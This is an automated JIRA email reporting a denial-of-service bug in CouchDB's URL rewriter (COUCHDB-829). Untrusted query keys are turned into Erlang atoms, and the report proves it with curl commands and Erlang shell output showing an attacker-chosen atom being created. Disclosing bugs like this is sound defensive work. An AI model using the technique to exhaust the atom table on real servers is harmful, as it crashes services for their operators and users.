Denial of Service vulnerability in rewriter
-------------------------------------------
Key: COUCHDB-829
URL: https://issues.apache.org/jira/browse/COUCHDB-829
Project: CouchDB
Issue Type: Bug
Components: Database Core
Affects Versions: 1.0
Environment: CouchDB trunk, erl R13B04
Reporter: Jason Smith
Untrusted, unsanitized user input should not be converted to atoms because it
allows the user to fill up the atom table in the VM, wasting memory and
eventually causing a couchdb crash.
If rewriting is enabled (which it is by default), and if an attacker knows a
database and ddoc name (even if the ddoc has no _rewrite rules), the attacker
can permanently enter atoms into system.
I have not exhaustively audited couch_httpd_rewrite.erl but for instance
handle_rewrite_req/3 converts all URL query keys to atoms.
[info] [<0.38.0>] Apache CouchDB has started on http://0.0.0.0:5984/
1> erlang:list_to_existing_atom("do_i_exist").
** exception error: bad argument
in function list_to_existing_atom/1
called as list_to_existing_atom("do_i_exist")
$ curl -X PUT localhost:5984/ex
{"ok":true}
$ curl -X PUT localhost:5984/ex/_design/ex -d {}
{"ok":true,"id":"_design/ex","rev":"1-967a00dff5e02add41819138abb3284d"}
$ curl http://localhost:5984/ex/_design/ex/_rewrite?do_i_exist=blah
{"error":"rewrite_error","reason":"Invalid path."}
2> [info] [<0.109.0>] 127.0.0.1 - - 'GET'
/ex/_design/ex/_rewrite?do_i_exist=blah 404
2> erlang:list_to_existing_atom("do_i_exist").
do_i_exist
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
